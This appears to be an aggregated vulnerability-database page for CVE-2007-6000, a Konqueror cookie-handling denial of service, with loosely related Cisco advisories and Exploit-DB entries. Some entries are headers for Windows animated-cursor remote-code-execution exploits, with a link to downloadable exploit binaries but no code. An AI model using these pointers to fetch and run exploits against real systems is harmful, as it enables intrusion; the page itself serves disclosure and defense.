CVE-2007-6000
Published 2007-11-15
CVE-2007-6000: KDE Konqueror 3.5.6 and earlier allows remote attackers to cause a denial of service (crash) via large HTTP cookie parameters.
Priority P421 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 3.34% (87.1th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kde | konqueror | <= 3.5.6 | — |
CVSS provenance
nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:N/I:N/A:P
vendor_cisco · 10.0 CRITICAL
GHSA
GHSA-5gw9-4f37-rxx8: KDE Konqueror 3
ghsa_unreviewed·2022-05-01
CVE-2007-6000 [MEDIUM] GHSA-5gw9-4f37-rxx8: KDE Konqueror 3
KDE Konqueror 3.5.6 and earlier allows remote attackers to cause a denial of service (crash) via large HTTP cookie parameters.
Cisco
Cisco Catalyst 6000, 6500 and Cisco 7600 Series MPLS Packet Vulnerability
vendor_cisco·2007-02-28·CVSS 3.3
CVE-2007-1258 [LOW] CWE-399 Cisco Catalyst 6000, 6500 and Cisco 7600 Series MPLS Packet Vulnerability
Cisco Catalyst 6500 series systems that are running certain versions of Cisco Internetwork Operating System (IOS) are vulnerable to an attack from a Multi Protocol Label Switching (MPLS) packet. Only the systems that are running in Hybrid Mode (Catalyst OS (CatOS) software on the Supervisor Engine and IOS Software on the Multilayer Switch Feature Card (MSFC)) or running with Cisco IOS Software Modularity are affected.
MPLS packets can only be sent from the local network segment.
This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20070228-mpls.
Cisco
Cisco Catalyst 6000, 6500 Series and Cisco 7600 Series NAM (Network Analysis Module) Vulnerability
vendor_cisco·2007-02-28·CVSS 10.0
CVE-2007-1257 [CRITICAL] Cisco Catalyst 6000, 6500 Series and Cisco 7600 Series NAM (Network Analysis Module) Vulnerability
Cisco Catalyst 6000, 6500 series and Cisco 7600 series that have a Network Analysis Module installed are vulnerable to an attack, which could allow an attacker to gain complete control of the system. Only Cisco Catalyst systems that have a NAM on them are affected. This vulnerability affects systems that run Internetwork Operating System (IOS) or Catalyst Operating System (CatOS).
Cisco has made free software available to address this vulnerability for affected customers.
This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20070228-nam.
Cisco
Cisco Catalyst 6000, 6500 and Cisco 7600 Series MPLS Packet Vulnerability
vendor_cisco
CVE-2007-1258 Cisco Catalyst 6000, 6500 and Cisco 7600 Series MPLS Packet Vulnerability
Cisco Catalyst 6500 series systems that are running certain versions of Cisco Internetwork Operating System (IOS) are vulnerable to an attack from a Multi Protocol Label Switching (MPLS) packet. Only the systems that are running in Hybrid Mode (Catalyst OS (CatOS) software on the Supervisor Engine and IOS Software on the Multilayer Switch Feature Card (MSFC)) or running with Cisco IOS Software Modularity are affected. MPLS packets can only be sent from the local network segment. This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20070228-mpls.
CWE: CWE-399
Bug IDs: CSCef90002, CSCsd37415
Cisco
Cisco Catalyst 6000, 6500 Series and Cisco 7600 Series NAM (Network Analysis Module) Vulnerability
vendor_cisco
CVE-2007-1257 Cisco Catalyst 6000, 6500 Series and Cisco 7600 Series NAM (Network Analysis Module) Vulnerability
Cisco Catalyst 6000, 6500 series and Cisco 7600 series that have a Network Analysis Module installed are vulnerable to an attack, which could allow an attacker to gain complete control of the system. Only Cisco Catalyst systems that have a NAM on them are affected. This vulnerability affects systems that run Internetwork Operating System (IOS) or Catalyst Operating System (CatOS). Cisco has made free software available to address this vulnerability for affected customers. This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20070228-nam.
Bug IDs: CSCsd75273, CSCse52951, CSCse39848
No detection rules found.
Exploit-DB
Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow
exploitdb·2008-07-06
CVE-2007-6166 Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow
Exploit-DB
KDE Konqueror 3.5.6 - Cookie Handling Denial of Service
exploitdb·2007-11-14
CVE-2007-6000 KDE Konqueror 3.5.6 - Cookie Handling Denial of Service
---
source: https://www.securityfocus.com/bid/26435/info
KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle overly large cookies.
An attacker may exploit this vulnerability to cause Konqueror to crash, resulting in denial-of-service conditions.
Konqueror 3.5.6 is vulnerable; other versions may also be affected.
Exploit-DB
Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow
exploitdb·2007-04-01
CVE-2007-1765 Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow
---
..::[ jamikazu presents ]::..
Windows Animated Cursor Handling Exploit (0day)
Works on fully patched Windows Vista
I think it is the first real remote code execution exploit on Vista =)
Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2
(It must also work on all NT-based Windows, but not tested)
Author: jamikazu
Mail: [email protected]
Bug discovered by determina (http://www.determina.com)
Credit: milw0rm, metasploit, SkyLined, http://doctus.net/
invokes calc.exe if successful
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3634.
Exploit-DB
Microsoft Windows - Animated Cursor '.ani' Remote (eeye patch Bypass)
exploitdb·2007-04-01
CVE-2007-1765 Microsoft Windows - Animated Cursor '.ani' Remote (eeye patch Bypass)
---
..::[ jamikazu presents ]::..
Windows Animated Cursor Handling Exploit (0day) (Version3)
Works on fully patched Windows Vista
I think it is the first real remote code execution exploit on Vista =)
Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2
(It must also work on all NT-based Windows, but not tested)
Update: It also bypasses the eeye security ani patch!
Author: jamikazu
Mail: [email protected]
Bug discovered by determina (http://www.determina.com)
Credit: milw0rm, metasploit, SkyLined, http://doctus.net/
invokes calc.exe if successful
https://gitlab.com/exploi
No writeups or analysis indexed.
http://securityreason.com/securityalert/3370
http://www.securityfocus.com/archive/1/483705/100/0/threaded
http://www.securityfocus.com/bid/26435
https://exchange.xforce.ibmcloud.com/vulnerabilities/38456
Published: 2007-11-15